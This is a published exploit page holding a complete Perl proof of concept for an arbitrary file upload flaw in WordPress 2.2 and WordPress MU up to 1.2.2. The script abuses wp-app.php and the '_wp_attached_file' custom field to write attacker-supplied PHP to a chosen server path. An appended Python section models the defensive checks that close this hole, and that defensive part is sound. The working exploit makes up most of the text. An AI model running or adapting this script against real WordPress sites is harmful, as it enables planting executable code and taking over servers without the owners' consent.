WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
Source: http://www.buayacorp.com/ Author: Alexander Published: 2007-06-27
#! /usr/bin/env perl

# Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC
#
# Credits : Alexander Concha <alex at buayacorp dot com>
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $ua = new LWP::UserAgent;
my $blog        = $ARGV[0];
my $user        = $ARGV[1];
my $pass        = $ARGV[2];
my $remote_file = $ARGV[3];
my $local_file  = $ARGV[4];
my $post_id     = $ARGV[5];

if (@ARGV < 4) {
       print "\nUsage:\n";
       print " wp-file-upload.pl <host> <username> <password> <remote_filename> [local_file] [post_id]\n\n";
       print " <host>        - full path to WordPress. http://victim.com/wordpress/\n";
       print " <username>    - valid username with any of these roles: author, editor, administrator\n";
       print " <password>    - valid password for the user\n";
       print " <remote_file> - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n";
       print " [local_file]  - file to upload\n";
       print " [post_id]     - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n";
       exit();
}
$ua->requests_redirectable([]);
$blog =~ s/\/*$/\//;

$url = 'wp-app.php';
if ( 200 != $ua->head($url . '?action=/service')->code ) {
       $url = 'app.php';
       die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n"
               unless 200 == $ua->head($url . '?action=/service')->code;
}

$auth_cookie = get_auth_cookie();

sub LWP::UserAgent::simple_request {
       my($self, $request, $arg, $size) = @_;
       $request->header('Cookie' => $auth_cookie);
       $request->content_type('image/gif') if $request->method eq "PUT";
       $request->uri($blog . $request->uri);

       $self->_request_sanity_check($request);
       my $new_request = $self->prepare_request($request);
       $response = $self->send_request($new_request, $arg, $size);

       print $request->method . " " . $request->uri . " " . $response->code . "\n";

       return $response;
}

sub get_contents {
       $file = shift;
       if ( -e $file ) {
               open FILE, $file or die("Invalid local file");
               $file = join('', <FILE>);
               close FILE;
       } else {
               $file = <<PHP;
<?php echo "Hello World!"; ?>
PHP
       }
       return $file;
}
sub get_auth_cookie {
       $response = $ua->head('wp-login.php?logout');
       if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) {
                       return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass));
       }
       return '';
}
if (0 == $post_id) {
       $response = $ua->get('wp-admin/post-new.php');
       die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code;

       if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) {
               $response = $ua->post('wp-admin/post.php', [
                       '_wpnonce' => $1,
                       'action' => 'post',
                       'post_ID' => $post_id,
                       'post_type' => 'post',
                       'post_title' => 'foo',
                       'metakeyselect' => '#NONE#',
                       'metakeyinput' => '_wp_attached_file',
                       'metavalue' => $remote_file
                       ], 'Cookie' => $auth_cookie);

               # Checks for post-new.php?posted=post_ID
               if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) {
                       $post_id = $1;
               }
       }
}
die "\nCould not get a valid post_id value.\n" unless 0 != $post_id;

$request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id);
$request->content(get_contents($local_file));
$response = $ua->request($request);

if ( 200 == $response->code ) {
       print "\nIt seems that the file has been posted successfully... :P\n";
       print "Use the following value to update the remote file: post_id '$post_id'\n";
} else {
       print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n";
}
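As an added defender-side example, not part of the original PoC or of WordPress itself: a Python model of the checks that close the path this script exercises, namely an internal `_wp_attached_file` key written through the ordinary custom-field form, and a PUT body declared as image/gif that is really PHP. `UPLOADS_DIR`, the extension list, the `MAGIC` table and all sample values are assumptions made for illustration.

```python
# Added example, not part of the original PoC: a model of the checks that
# close the path it exercises. UPLOADS_DIR, the extension list and the
# sample values are constructed for illustration.
import posixpath
from typing import Optional

UPLOADS_DIR = "/var/www/wordpress/wp-content/uploads"  # assumed uploads root
ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

def vulnerable_target_path(attached_file: str) -> str:
    """The weak behaviour the PoC relies on: the stored '_wp_attached_file'
    value becomes the write destination unchanged."""
    return attached_file

def is_protected_meta(key: str) -> bool:
    """Custom-field input must not be allowed to set internal keys; the
    PoC sets '_wp_attached_file' through the ordinary meta form."""
    return key.startswith("_")

def safe_target_path(attached_file: str) -> Optional[str]:
    """Resolve the stored name to a path that stays inside UPLOADS_DIR and
    has an allowed image extension; return None otherwise."""
    if not attached_file or "\x00" in attached_file:
        return None
    if posixpath.isabs(attached_file):          # upload records are relative
        return None
    ext = posixpath.splitext(attached_file)[1].lower()
    if ext not in ALLOWED_EXT:                  # .php and friends never land on disk
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOADS_DIR, attached_file))
    if not candidate.startswith(UPLOADS_DIR + "/"):  # traversal escaped the root
        return None
    return candidate

def body_matches_extension(body: bytes, ext: str) -> bool:
    """The PoC labels a PHP body as image/gif; trust the bytes, not the header."""
    return any(body.startswith(m) for m in MAGIC.get(ext.lower(), ()))
```

Run against the PoC's own values, the absolute `.php` destination and the `<?php ...` body are both rejected, while a relative `.gif` name with a real GIF header is accepted.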
